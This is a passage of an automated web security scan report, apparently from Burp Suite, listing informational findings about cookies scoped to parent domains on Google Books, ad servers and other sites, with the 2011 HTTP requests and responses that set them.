Set-Cookie: PREF=ID=66f43664986180c9:TM=1304592763:LM=1304592763:S=sW2wguO7dQkK_rw8; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

16.48. http://books.google.com/bkshp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/bkshp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=c1d7b38e1628288e:TM=1304592763:LM=1304592763:S=6Y9aNBav9Lheselb; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
NID=46=YOcf_JLU_JBMBBzye7DnIORhv7UNGEFY-HO8-JIyoncdmZhpT1oTlXnZS8gUGVXemremLPEtoWl6Wi3g9z2rL-GyE1-8sLO8aAzp6I9CGRNv8bSqFTj280CvMy0XDZ2x; expires=Fri, 04-Nov-2011 10:52:43 GMT; path=/; domain=.google.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:43 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c1d7b38e1628288e:TM=1304592763:LM=1304592763:S=6Y9aNBav9Lheselb; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=YOcf_JLU_JBMBBzye7DnIORhv7UNGEFY-HO8-JIyoncdmZhpT1oTlXnZS8gUGVXemremLPEtoWl6Wi3g9z2rL-GyE1-8sLO8aAzp6I9CGRNv8bSqFTj280CvMy0XDZ2x; expires=Fri, 04-Nov-2011 10:52:43 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

16.49. http://books.google.com/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/books

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=db8ca40d82c23353:TM=1304592763:LM=1304592763:S=FY0-wvBYSE_o2B0V; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
NID=46=XblbW1BMLx5n-e6-TrHwaY-mpnyy00_HXQ0ReKuAFkkyQjoNXAO5Bf2SFk4C96cEMmh-nbxnFdV9NM7mcyFOVCBI-4fb1JH6LJ5fvTBkvjpupvas6MpcqsovYwRUUn1v; expires=Fri, 04-Nov-2011 10:52:43 GMT; path=/; domain=.google.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:43 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=db8ca40d82c23353:TM=1304592763:LM=1304592763:S=FY0-wvBYSE_o2B0V; expires=Sat, 04-May-2013 10:52:43 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=XblbW1BMLx5n-e6-TrHwaY-mpnyy00_HXQ0ReKuAFkkyQjoNXAO5Bf2SFk4C96cEMmh-nbxnFdV9NM7mcyFOVCBI-4fb1JH6LJ5fvTBkvjpupvas6MpcqsovYwRUUn1v; expires=Fri, 04-Nov-2011 10:52:43 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

16.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=jlP8aJjE0dpH00001jAsGaJH702WG00001jBofaIOs07Si00001; expires=Wed, 03-Aug-2011 08:39:08 GMT; domain=.serving-sys.com; path=/
B3=8Whx0000000001uu9wtb0000000001ur9oDg0000000001ut; expires=Wed, 03-Aug-2011 08:39:08 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2335841&PluID=0&w=300&h=250&ord=599147281&cs=1&ncu=$$http://at.atwola.com/adlink/5113/675309/0/170/AdId=1579608;BnId=6;itime=599147281;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Faim;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=35423;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; A3=jlP8aJjE0dpH00001jBofaIOs07Si00001; B3=9wtb0000000001ur9oDg0000000001ut; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001jAsGaJH702WG00001jBofaIOs07Si00001; expires=Wed, 03-Aug-2011 08:39:08 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000001uu9wtb0000000001ur9oDg0000000001ut; expires=Wed, 03-Aug-2011 08:39:08 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:39:07 GMT
Connection: close
Content-Length: 3646

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

16.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

u2=97f764ad-fb75-4e5f-b869-79e1ca30994b3HX060; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=97f764ad-fb75-4e5f-b869-79e1ca30994b3HX060; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=0; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0

16.52. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/cm/js/10295-119241-2568-4

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=10295:2568/17671:21707; expires=Sun, 5-May-2013 5:51:54 GMT; path=/; domain=.eyewonder.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm/js/10295-119241-2568-4?mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10295:2568/17671:21707; expires=Sun, 5-May-2013 5:51:54 GMT; path=/; domain=.eyewonder.com;
Location: http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=
Content-Length: 0
Date: Thu, 05 May 2011 12:39:16 GMT

16.53. http://clk.atdmt.com/CNT/go/319709115/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/CNT/go/319709115/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592769-11855191; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=B8ED1941DD884FED9A24AB3498C6A8DE; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=6cb8/1a43a; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=39505b4/1a43a/130e5fbb/6cb8/4dc28181; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/319709115/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.att.com/?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592769-11855191; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=B8ED1941DD884FED9A24AB3498C6A8DE; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/1a43a; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=39505b4/1a43a/130e5fbb/6cb8/4dc28181; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:49 GMT
Connection: close

16.54. http://clk.atdmt.com/M0N/go/314366790/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/M0N/go/314366790/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592769-11855641; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=648C412C60BB42EFB8DECE8E8F07417F; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=c42d/26fc; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=88df6e/26fc/12bcdb46/c42d/4dc28181; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /M0N/go/314366790/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sprint.com
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592769-11855641; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=648C412C60BB42EFB8DECE8E8F07417F; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c42d/26fc; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=88df6e/26fc/12bcdb46/c42d/4dc28181; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:49 GMT
Connection: close

16.55. http://clk.atdmt.com/NYC/go/310177527/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/NYC/go/310177527/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11854052; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=42F7F126ED3140AD9B0D5AF345CAE7D6; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=c054/278e5; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=b08aeb9/278e5/127ceef7/c054/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NYC/go/310177527/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.citi.com/domain/home.htm
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11854052; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=42F7F126ED3140AD9B0D5AF345CAE7D6; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c054/278e5; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=b08aeb9/278e5/127ceef7/c054/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

16.56. http://clk.atdmt.com/go/253735206/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/253735206/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11853302; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=C34B820C4B674082B1D6B2C3875DF9F7; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=e848/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=772a248/120af/f1fb126/e848/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253735206/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11853302; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=C34B820C4B674082B1D6B2C3875DF9F7; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=e848/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=772a248/120af/f1fb126/e848/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:47 GMT
Connection: close

16.57. http://clk.atdmt.com/go/253735225/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/253735225/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11852912; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=1E470D4DBBFA4EA89878F04E3A6F1B62; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=6cb8/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=772a248/120af/f1fb139/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253735225/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11852912; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=1E470D4DBBFA4EA89878F04E3A6F1B62; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=772a248/120af/f1fb139/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

16.58. http://clk.atdmt.com/go/253735228/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/253735228/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11852732; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=82D4FA476FA049968CFA519E7F0F9D41; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=6cb8/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=772a274/120af/f1fb13c/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253735228/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11852732; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=82D4FA476FA049968CFA519E7F0F9D41; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=772a274/120af/f1fb13c/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

16.59. http://clk.atdmt.com/go/310177527/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/310177527/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11852792; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=3C04F9261C6F4A83B12A2D2F035CAB9C; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=c054/278e5; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=b08aeb9/278e5/127ceef7/c054/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/310177527/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.citi.com/domain/home.htm
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11852792; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=3C04F9261C6F4A83B12A2D2F035CAB9C; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c054/278e5; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=b08aeb9/278e5/127ceef7/c054/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:47 GMT
Connection: close

16.60. http://clk.atdmt.com/go/314366790/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/314366790/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11853752; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=3DE6EDA96D3F43C4A3BE01A32E3B4637; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=c42d/26fc; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=88df6e/26fc/12bcdb46/c42d/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/314366790/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sprint.com
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11853752; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=3DE6EDA96D3F43C4A3BE01A32E3B4637; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c42d/26fc; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=88df6e/26fc/12bcdb46/c42d/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

16.61. http://clk.atdmt.com/go/319709115/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/319709115/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001304592768-11853482; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
MUID=C8B9F81D48AC41F78FBBF63F33CDDFF8; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
ach00=6cb8/1a43a; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=39505b4/1a43a/130e5fbb/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/319709115/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.att.com/?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11853482; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=C8B9F81D48AC41F78FBBF63F33CDDFF8; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/1a43a; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=39505b4/1a43a/130e5fbb/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:47 GMT
Connection: close

16.62. http://developers.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

